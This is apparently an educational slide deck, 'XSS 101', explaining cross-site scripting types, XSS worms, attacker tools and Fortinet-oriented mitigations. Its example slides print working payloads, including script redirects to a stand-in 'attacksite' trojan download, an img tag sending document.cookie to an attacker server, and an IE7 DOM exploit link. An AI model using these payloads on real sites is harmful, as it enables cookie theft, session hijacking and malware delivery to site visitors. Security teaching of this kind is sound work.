XSS 101 Jason Clark 12/20
XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)
XSS Explained Web app vulnerability that allows code injection and cross site commands Java, php, cgi, asp, html, dhtml i.e. JavaScript provides the ability to create an iframe within a site thus allowing cross site commands Attack takes advantage of the way HTML code is interpreted by browser Majority of sites do not filter user input i.e. encoding ‘spaces’, #, <, >, XSS characters such as ; “ { (within <script tags) Typically involves “social engineering” Spoofed email with encoded malicious URL XSS security is commonly overlooked due to lack of impact on Server XSS can be completely transparent to client Common and evasive attack due to client side vulnerability i.e. does not directly attack vulnerable web server
XSS Explained Myths XSS always involves “crossing sites” i.e. web defacement, crafted URLs i.e. iframes populated with legit websites User needs to actively select link or URL XSS attacks can be exploited via HTML emails, message boards, guestbooks... Using ‘onmouseover’ users only need to move the mouse over an active link <a href="mailto:xss@xss.com" onmouseover="alert('testing');">XSS</a> Using window.onload scripts may be executed by simply viewing an email or web page <a href="http://cnn.com" window.onload="alert(‘document.cookie');“>cnn.com</a> <script>document.location="http://attacker.com/trojan.exe";</script>
XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)
DOM Based Document Object Model DOM Based XSS API which defines how documents are structured and accessed i.e. allows XML to be presented as a document on various systems Defines cross domain controls (scripts may not be run across domains, except local zone) DOM Based XSS Code is not submitted to web server (in most cases) RSS pages, InetE local pages, Also referred to as client-side XSS Bypasses client-side sandbox Difficult to detect (and secure) http://example.com#evil_code
DOM Based Example Attacker chooses a vulnerable web page on a victim host IE7 navcancl.htm design flaw Attacker crafts a link which exploits navcancl.htm res://ieframe.dll/navcancl.htm#http://www.google.com/_____<alter.navcancl.htm> res://ieframe.dll/navcancl.htm#http://192.168.1.22/skype/skypeshutdown.html Or simply http://google.com#<script> Note: all code after the fragment ‘#’ does not get submitted to server XSS’d! - Attacker now has the ability to execute arbitrary code on behalf of user
DOM Based Example Attacker chooses a vulnerable web page on a victim host IE7 navcancl.htm design flaw Attacker crafts a link which exploits navcancl.htm res://ieframe.dll/navcancl.htm#http://www.google.com/_____<alter.navcancl.htm> res://ieframe.dll/navcancl.htm#http://192.168.1.22/skype/skypeshutdown.html Or simply http://google.com#evil_code Note: all code after the fragment ‘#’ does not get submitted to server XSS’d! - Attacker now has the ability to execute arbitrary code on behalf of user
Non-Persistent XSS non-persistent Most common XSS attack Attacker typically needs to supply crafted URL to victim http://legitsite.com/search=<script>document.location="http://attacksite/trojan.exe";</script> Client data is processed by server-side scripting i.e. server embeds <script> to web page which is executed by client browser Vulnerable pages will display data without encoding HTML or filtering i.e. search engines which display key word search back to user Search engines, forms…
Non-Persistent XSS Example Attacker determines vulnerable non-persistent site <script>alert('testing');</script> <a href="mailto:xss@xss.com" onmouseover="alert('testing');">XSS</a> Attacker crafts a malicious link to site containing instruction script Malicious link is encoded to look “friendly” Malicious link is sent to end user via email with intriguing title Depending on end user security settings user either clicks on link or “auto load” Web server/application executes malicious javascript Stolen cookies Session hijacking Attacker essentially has “rights” of victim
Non-Persistent XSS Example Attacker determines vulnerable non-persistent site <script alert(XSS)</script> Attacker crafts a malicious link to site containing instruction script Malicious link is encoded to look “friendly” Malicious link is sent to end user via email with intriguing title Depending on end user security settings user either clicks on link or “auto load” Web server/application executes malicious javascript Stolen cookies Session hijacking Attacker essentially has “rights” of victim
Persistent XSS Persistent Most devastating and furthest reaching attack Typically exploited by allowed (unfiltered) HTML injections Similar to non-persistant XSS though no need to provide crafted URL to victim Unlimited code execution Vulnerable message board would typically allow all html tags User data is stored in a web db or file system i.e guest books, messages boards w/o encoding, May be used to distribute XSS Viruses
Persistent XSS Example Attacker determines site vulnerable to Persistent XSS Ideally attacker is looking for a high traffic message board Attacker posts a controversial message with expectation of multiple views i.e. “Fortinet announces S1 filing click here to read more” Or Attacker uses window.onload function so script is executed on view Victim selects link in message board post, or simply views page with active code XSS’d! – at this point various payload functions can be performed Cookie stealing, Trojan download, key logging, XSS Worm propagation <img src=“javascript:document.location(‘http://attacksrv/cookies.php’= . (document.cookie));”>
XSS Worms SCRAPE Utilize external engines to identify victims such as xssed.com or search engines Attacker creates dynamic scripts which parses xssed.com, extracts attack vector info, then propagates XSS worm via victim sites SPECIFIC Typically targets specific victims Purpose is to remain on the target propagating within a single server or app i.e. Samy XSS worm (MySpace XSS worm) GENERIC No specific target application Exploits generalized variables Example
XSS Worms Example Attacker posts a link to a vulnerable high traffic web forum (say 1.0.0.1) Java or php scripts utilizes hidden iframe which executes <script src=attackersite/worm.js</script> Script contains target iframe of 1.0.0.0/8 as well as get_random for running through remainder of subnet (exploiting vulnerable sites) Note: there is a little more to this such as http://” + address +”/index.php Random address is inserted in address and index.php will (hopefully) be resident At this point each time the page is viewed script is executed which in turn runs through entire class A subnet prorogating XSS worm/virus
XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)
Determining Vulnerable Sites Public Sites www.xssed.com Scanners Nikto Too many too mention… Scripts Use on search boxes, forms, web accounts, bank logins <script>alert(‘xsstesting');</script> FireFox XSS ME Tamper Data Many more…
XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)
What now What can I do with XSS? Tools Cookie theft Session riding/hijacking (CSRF) False advertisements/Free advertising Hit stealing Identity theft Web page defacement XSS worm propagation Tools BeEF XSS-Proxy Backframe Java, php, cgi, html, etc
XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples/Tools Mitigating XSS (Basics and Fortinet)
XSS Examples and Tools Scripts Tools <script>document.location="http://attacksite/trojan.exe";</script> <script> alert(document.cookie) </script> <a href=mailto:email@xss.com onmouseover="alert('Hacked');“>email@xss</a> <a href="javascript: src="http://192.168.1.22:2000/xss2.js">testlink</a> res://ieframe.dll/navcancl.htm#http://192.168.1.22/skype/skypeshutdown.html about:cancel#http://anysite/");alert(“Hacked");// <iframe src=http://attacksite.com/script.html> Tools BeEF XSS-Proxy Backframe Java, perl, cgi, html, etc…
XSS Examples and Tools Scripts Tools <script>document.location="http://attacksite/trojan.exe";</script> <script> alert(document.cookie) </script> <a href=mailto:email@xss.com onmouseover="alert('Hacked');“>email@xss</a> <a href="javascript: src="http://192.168.1.22:2000/xss2.js">testlink</a> res://ieframe.dll/navcancl.htm#http://192.168.1.22/skype/skypeshutdown.html about:cancel#http://anysite/");alert(“Hacked");// <iframe src=http://attacksite.com/script.html> Tools BeEF XSS-Proxy Backframe Java, perl, cgi, html, etc…
XSS Examples and Tools Scripts Tools <script>document.location="http://attacksite/trojan.exe";</script> <script> alert(document.cookie) </script> <a href=mailto:email@xss.com onmouseover="alert('Hacked');“>email@xss</a> <a href="javascript: src="http://192.168.1.22:2000/xss2.js">testlink</a> res://ieframe.dll/navcancl.htm#http://192.168.1.22/skype/skypeshutdown.html about:cancel#http://anysite/");alert(“Hacked");// <iframe src=http://attacksite.com/script.html> Tools BeEF XSS-Proxy Backframe Java, perl, cgi, html, etc…
XSS Explained XSS Types Determining Vulnerable Sites What can you do with XSS? XSS Examples/Tools Mitigating XSS (Basics and Fortinet)
Mitigating XSS Input Filtering Allow only expected/necessary user input Web Application Firewalls – Feature Request Fortigate! Antivirus – known XSS worms, phishing emails Antispam – Potential phishing emails JavaScript control – block <script> functions Fortiguard Web Filtering – block known malicious sites Intrusion Prevention XSS Signatures Custom signatures for user filtering End user controls Enforcing browser security Patch management Keeping browser /OS patches up-to-date Forticlient! – web, av, ips, antispam, anti-grayware
The End Disclaimer: This presentation is meant to educate the security professional in hopes of creating awareness of Cross Site Scripting. I am not responsible for any scripts contained or the use thereof within this documentation